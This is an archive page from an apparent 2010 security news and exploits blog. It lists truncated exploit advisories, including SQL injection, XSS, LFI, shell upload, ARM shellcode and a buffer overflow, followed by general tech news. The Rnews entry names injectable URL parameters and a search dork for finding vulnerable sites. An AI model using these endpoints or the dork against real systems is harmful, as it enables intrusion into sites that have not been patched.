Information Security News and Exploits

Providing you with Security News and Exploits from all over the web.

Entries for June, 2010

Rnews Feed Aggregator v1.01 (search/index) SQL Injection Vulnerability

======================================================================
Rnews Feed Aggregator v1.01 (search/index) SQL Injection Vulnerability
======================================================================
Scriptname.......: Rnews v1.01
Scriptpage.......: http://rnews.sourceforge.net
Scriptdownload...: http://sourceforge.net/projects/rnews/files/rnews/
Category.........: Webapps/0day
Bug-Author.......: Bloodman
Bug-Published....: 30.06.2010
Bug-Reported.....: 30.06.2010 (reported to the coder)
Bug-Fixed........: No
Security-Risk....: Medium
Vulnerability....: Some SQL-Injections
Dork-Information.: allinurl:"rnews"
Bug-Information..: search.php and index.php
Vulnerable-Files.:
http://localhost.com/rnews/search.php?q=[SQL]
http://localhost.com/rnews/index.php?view=[SQL]
====================================================================================
Greets...........: Inj3ct0r, apu, [...]


Joomla joomproperty XSS Vulnerability

=====================================
Joomla joomproperty XSS Vulnerability
=====================================
[...]


ES Simple Uploader v 1.1 => upload shell Vulnerability

======================================================
ES Simple Uploader v 1.1 => upload shell Vulnerability
======================================================
##########################################
#[+] Date: 30/06/2010
#[+] Author: MeGo
#[+] Tested ON :windows xP
#[+] MY Team : Team Hacker Egypt
#[+] Email: M3GO@live.com
#[+] CategorY : Webapps/0day [...]


linux/ARM – Disable ASLR Security – 102 bytes

=============================================
linux/ARM – Disable ASLR Security – 102 bytes
=============================================
/*
Title: Linux/ARM – Disable ASLR Security – 102 bytes
Date: 2010-06-20
Tested: Linux ARM9 2.6.28-6-versatile
Author: Jonathan Salwan
Web: http://shell-storm.org | [...]


Mini-Stream RM-MP3 Converter v3.1.2.1 Buffer Overflow Exploit (SEH)

===================================================================
Mini-Stream RM-MP3 Converter v3.1.2.1 Buffer Overflow Exploit (SEH)
===================================================================
#http://www.mini-stream.net/downloads/Mini-streamRM-MP3Converter.exe
#By Madjix Dz8[at]hotmail[dot]com
#Greets: *Volc4n0 alone*
[...]


Joomla Component com_myblogcontroller LFI Vulnerability

=======================================================
Joomla Component com_myblogcontroller LFI Vulnerability
=======================================================
[?] My h0m3: [http://HaCkTeCh.Org/cc& Pal-Li0n.som [...]


InteRa CMS (index.php) Blind SQL Injection Vulnerability

========================================================
InteRa CMS (index.php) Blind SQL Injection Vulnerability
========================================================
[...]


ArgoWeb Blind SQL Injection Vulnerability

=========================================
ArgoWeb Blind SQL Injection Vulnerability
=========================================
[...]


SUMATRA PDF READER version 1.1 (CRASHER) DoS File Creator

=========================================================
SUMATRA PDF READER version 1.1 (CRASHER) DoS File Creator
=========================================================
###########################################################################
###########################################################################
######## SUMATRA PDF READER version 1.1 (CRASHER) DoS File Creator ########
###########################################################################
# Vulnerability Detection [...]


The Webcam Hacker Sex Crimes

A divorced mother of three in Seattle, K.S. opened her email one day and found a message from a stranger. “Read This and Be Smart,” it said. When K.S. opened the email she found, to her horror, a sexually explicit photo – of herself.
The accompanying note was nothing less than blackmail: “This is what I want: a [...]


Strathclyde Police Shutdown Its Website

Strathclyde Police from Glasgow, UK, was compelled to shut down its website because of the fear of virus attack from Chinese hackers.
The website was shut down in order to enable the IT department of Strathclyde Police to examine the threat after some web links appearing on the website redirecting users to a website known for [...]


UM counseling center database hacked

A data breach of computers at the University of Maine’s counseling center allowed hackers to access not only the Social Security numbers and dates of birth of students and alumni who have sought its services in the past eight years but clinical information as well.
Students or former students who visited the counseling center between Aug. [...]


How many enterprise admins is too many?

I’m often asked how many enterprise admins – the most privileged users on a Windows network – a company should have. The answer is straightforward enough: the bare minimum. Doling out that type of power willy-nilly is a great way to expose your systems to attacks. In fact, the No. 1 way to minimise overall [...]


Small is beautiful: Put a cell tower in your house

Femtocells sound vaguely like a cross between a Feynman diagram and a biology class, but they’re the latest piece of gear that millions of people will soon want in their homes without having missed them before. A femtocell is a small cellular base station designed to provide superior, short-range, indoor cellular coverage in a home [...]


Unsealed court documents reveal Dell knew it sold faulty computers

Documents recently unsealed in a three-year old court case against Dell Computer indicated that the company sold millions of computers with faulty parts, knowing full well that the components inside were faulty.
First reported by the New York Times, the computers were sold in a two-year period from 2003 to 2005, and were sold to educational [...]


Porn industry joins Apple in dropping Flash

It looks like Steve Jobs is no longer alone in his crusade to rid the world of Adobe’s video player software Flash, as the adult video industry turns towards the open HTML5 standard.
Conceivably Tech has spoken to the founder of web porn giant Digital Playground (DP) who reckons his company will be dropping Flash like [...]


Possible fix for iPhone 4 signal problems available?

One of the most popular topics regarding the new iPhone 4 is the reception issues a number of people have mentioned that seem to be exacerbated by hand placement on the device. While Apple currently suggests avoiding certain hand positions or using a case, there is a new report that suggests a possible fix for [...]


Microsoft steps up attack on Google Docs

In a blog post on Monday, Barbara Gordon, who heads Microsoft’s customer service and support, argued that her company’s offerings beat Google’s hands down.
"The launch of Office 2010 earlier this month reminded me just how much this makes us different," Gordon said. "When was the last time you called Google for help recovering a lost [...]


PS3 Update Brings PlayStation Plus And Facebook

Sony has released the new system software update v3.04 for its PlayStation 3 (PS3) games console.
The update will bring Facebook integration to the console, as well as launching Sony’s new premium PlayStation Network (PSN) service, PlayStation Plus.
The Facebook for PS3 application will allow users to integrate their PSN profiles with their Facebook profiles, allowing them [...]


Dell Inc. hiring 5,000 sales workers

After two years of job cuts to reduce operating expenses, Dell Inc. is now shifting gears to hire 5,000 sales workers to bolster the marketing of its enterprise solutions.
The 45 percent increase in sales people over three years is part of Round Rock-based Dell’s (Nasdaq: DELL) plan to double its data center business by selling [...]
